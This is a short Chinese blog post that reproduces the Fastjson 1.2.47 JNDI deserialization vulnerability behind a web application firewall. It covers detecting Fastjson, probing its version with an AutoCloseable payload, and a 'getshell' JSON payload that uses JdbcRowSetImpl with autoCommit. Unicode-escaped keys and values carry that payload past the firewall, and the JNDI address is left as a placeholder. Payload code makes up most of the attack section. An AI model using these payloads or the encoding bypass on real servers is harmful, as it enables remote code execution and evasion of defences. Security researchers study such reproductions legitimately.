1247-jndi-waf

复现#

1.判断#

既然是Json格式自然优先尝试是否是Fastjson.
判断是否为Fastjson：删掉末尾的}或添加",使其解析报错，这样就代表的使用的是 fastjson。

2.查看版本#

接下来就是探测版本.
有两种方法，通过报错和Dnslog.

{
  "@type":"java.lang.AutoCloseable"

从返回包可以发现有 waf 拦截,但是Fastjson本身是默认识别并解码hex和unicode编码的，所以可以利用这个特性绕过。

{
  "\u0040\u0074\u0079\u0070\u0065":
"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0041\u0075\u0074\u006f\u0043\u006c\u006f\u0073\u0065\u0061\u0062\u006c\u0065"

getshell#

{{
    "a":{
        "\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073",
        "\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"
    },
    "b":{
        "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c",
        "\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"You_payload_is_here",
      "\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074":"\u0074\u0072\u0075\u0065"
    }
}

作者：qianyuzz

出处：https://www.cnblogs.com/qianyuzz/p/17999057

版权：本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。

posted @ 2024-01-31 13:14 qianyuzz 阅读(66) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· 1247-jndi

· Fatsjson1245漏洞复现

· FastJson漏洞复现

· java反序列化学习之--Fastjson利用笔记

· fastjson 反序列化漏洞复现

Loading

Qianyuzz's Blog

得之我幸失之我命

1247-jndi-waf

1247-jndi-waf

复现#

1.判断#

2.查看版本#

getshell#

搜索

最新随笔

随笔分类 (77)

随笔档案 (61)

推荐排行榜

Loading

Qianyuzz's Blog

得之我幸 失之我命

1247-jndi-waf

1247-jndi-waf

复现#

1.判断#

2.查看版本#

getshell#

搜索

最新随笔

随笔分类 (77)

随笔档案 (61)

推荐排行榜

得之我幸失之我命